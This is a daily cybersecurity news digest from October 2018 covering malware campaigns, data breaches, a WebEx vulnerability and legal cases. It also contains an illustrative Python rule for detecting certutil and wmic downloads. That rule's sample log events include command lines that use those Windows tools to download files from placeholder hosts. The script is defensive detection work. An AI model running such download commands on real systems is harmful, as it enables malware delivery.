Silobreaker Daily Cyber Digest – 25 October 2018
New Mac malware found to intercept encrypted web traffic to display ads
- Malwarebytes researcher Adam Thomas discovered a new Mac malware named OSX[.]SearchAwesome.
- According to Thomas, OSX[.]SearchAwesome differs from other adware by installing a certificate that allows it to access HTTPS traffic and carry out man-in-the-middle (MitM) attacks. The malware was found to inject scripts from malicious websites into web pages loaded on the infected device.
- The researcher also warns that the injected script could potentially be used for many other purposes such as redirecting users to phishing websites, mining cryptocurrency or capturing browsing data and keylogging.
Malware targets Brazil using Windows components WMI and CertUtil
- The two legitimate Windows files wmic.exe and certutil.exe were abused to download the malware’s payload onto the victim’s device. Although both files have been used in malware campaigns before, this attack incorporates the two together, whilst also adding anti-evasion layers.
- The malware is distributed via a malicious email that notifies the target of an unsuccessful delivery attempt, prompting the victim to click on a link that will open a browser window, further prompting the user to download a ZIP file.
- Trend Micro assesses that the final payload is a banking malware that only functions when the victim’s language is set to Portuguese, suggesting it is likely that the campaign is targeting users in Portuguese-speaking countries such as Brazil.
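As an added illustration, not taken from the digest or from Trend Micro’s report, the routine below flags process-creation events in which certutil.exe or wmic.exe is launched with a URL on its command line, the download pattern described above. The key=value log format, hostnames and sample events are constructed; the page does not give the campaign’s actual command lines.

```python
import re
from typing import Dict, List, Optional

# Legitimate Windows binaries named in the report; both will fetch remote
# content when handed a URL, which is what makes them useful to malware.
WATCHED_BINARIES = {"certutil.exe", "wmic.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample telemetry (not real logs); example.invalid never resolves.
SAMPLE_EVENTS = [
    'ts=2018-10-25T09:01:10Z host=WS01 image=C:\\Windows\\System32\\certutil.exe '
    'parent=cmd.exe cmdline="certutil.exe -urlcache -split -f http://updates.example.invalid/p.zip p.zip"',
    'ts=2018-10-25T09:02:33Z host=WS01 image=C:\\Windows\\System32\\wbem\\WMIC.exe '
    'parent=cmd.exe cmdline="wmic os get /format:https://cdn.example.invalid/x.xsl"',
    'ts=2018-10-25T09:03:01Z host=WS02 image=C:\\Windows\\System32\\certutil.exe '
    'parent=mmc.exe cmdline="certutil.exe -store my"',
    'ts=2018-10-25T09:03:45Z host=WS02 image="C:\\Program Files\\Browser\\browser.exe" '
    'parent=explorer.exe cmdline="browser.exe https://www.example.invalid/"',
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value line into a dict; quoted values may contain spaces."""
    fields: Dict[str, str] = {}
    for m in re.finditer(r'(\w+)=("([^"]*)"|\S+)', line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return fields


def flag_lolbin_download(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert when a watched binary is started with a URL argument.

    Benign uses of the same binaries (e.g. certutil -store) carry no URL and
    are left alone, which keeps the rule's false-positive rate low.
    """
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    if image not in WATCHED_BINARIES:
        return None
    m = URL_RE.search(event.get("cmdline", ""))
    if not m:
        return None
    return {"host": event.get("host", "?"), "binary": image,
            "parent": event.get("parent", "?"), "url": m.group(0)}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run the rule over a batch of raw log lines and collect the alerts."""
    alerts = (flag_lolbin_download(parse_event(line)) for line in lines)
    return [a for a in alerts if a is not None]


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {a['host']}: {a['binary']} (parent {a['parent']}) fetched {a['url']}")
```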
McAfee discover TimpDoor backdoor turning mobile devices into hidden proxies
- McAfee’s research team have discovered a phishing campaign using text messages that trick users into downloading a fake voice message app. The fake app delivers TimpDoor, which gives threat actors the ability to use infected devices as network proxies without the victim’s knowledge.
- After installation, the malware, detected by McAfee as Android/TimpDoor, runs a background service that starts a SOCKS proxy which ‘redirects network traffic from a third-party server via an encrypted connection through a secure shell tunnel’. The shell tunnel allows potential access to internal networks and bypasses network security mechanisms.
- Of the 26 malicious APK files discovered on the main distribution server, the earliest TimpDoor variant has been available since March 2018, and the apps have infected at least 5,000 devices in the United States.
South Korean researchers detect new cyber attack by the Lazarus Group
- Researchers from ESTsecurity discovered a new campaign attributed to the Lazarus Group, in which malicious files are disguised as government documents running on Hangeul, a Korean-language word processor.
- The researchers found that the malicious files contain the same metadata and functions that were used in Lazarus Group’s attacks on Sony Pictures.
ESET discover more banking trojans on official Google Play store
- 29 trojans discovered in the Google Play store were masquerading as device boosters and cleaners, battery managers and, in some cases, horoscope-themed apps.
- The trojans are capable of targeting apps found on the victim’s device with tailored phishing forms. In addition, they can intercept and redirect text messages to bypass SMS-based two-factor authentication, download and install apps onto the infected device, and intercept call logs.
- The apps have some code similarities and share a C&C server, despite being uploaded under different developer names. The malicious apps have now been removed from Google Play.
Leaks and Breaches
Surveillance company Wolf Intelligence exposes its own data
- Security researchers from CSIS Security discovered that Wolf Intelligence, a German startup offering surveillance and hacking technology to governments worldwide, exposed 20 GB of data through an unprotected C&C server and public Google Drive folder.
- The data includes recordings of meetings with customers, a passport scan and credit card scan belonging to the company’s founder and data collected from surveillance targets.
- Wolf Intelligence founder Manish Kumar claimed that an unidentified reseller was responsible for the leak and ‘plans to sue CSIS for hacking his reseller’, despite CSIS finding the data to be publicly accessible online.
Cathay Pacific data breach exposes 9.4 million customers’ data
- The data accessed includes names, birthdates, phone numbers, email addresses, passport numbers, ID card numbers, historical travel information, and more. 403 expired credit card numbers and 27 credit card numbers with no CVVs were also breached.
- The airline first detected suspicious activity on its systems in March 2018. The airline plans to notify all customers affected by the breach.
Pocket iNet accidentally exposes sensitive data
- Researchers from UpGuard found the data in a publicly accessible AWS S3 bucket that did not require a password, belonging to Pocket iNet, a Washington State internet provider. The data was 73 GB in size and included passwords to servers, switches, routers and core firewalls, as well as spreadsheets, pictures and diagrams.
- It was first discovered on October 11th, 2018 and was secured a week later.
Remote Code Execution vulnerability discovered in Cisco WebEx
- Disclosed by Ron Bowes and Jeff McJunkin of Counter Hack, the remote code execution vulnerability CVE-2018-15442, known as WebExec, can allow an attacker to execute commands through a component of WebEx, even when it is not listening for remote connections.
- The bug has since been fixed in Cisco Webex productivity tools version 33.0.5 and later.
Guccifer to be extradited to US to serve 52-month prison sentence
- Guccifer was released from a Romanian prison and is now ready to be extradited to the US to serve 52 months in prison for hacking US government officials between 2012 and 2014.
Yahoo reaches settlement regarding historical security breach
- Yahoo reached a settlement in a lawsuit regarding the security breaches that occurred in 2013 and 2014 but were not reported until 2016. They will pay $50 million in damages and provide two years of free credit-monitoring services to the 200 million individuals affected.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.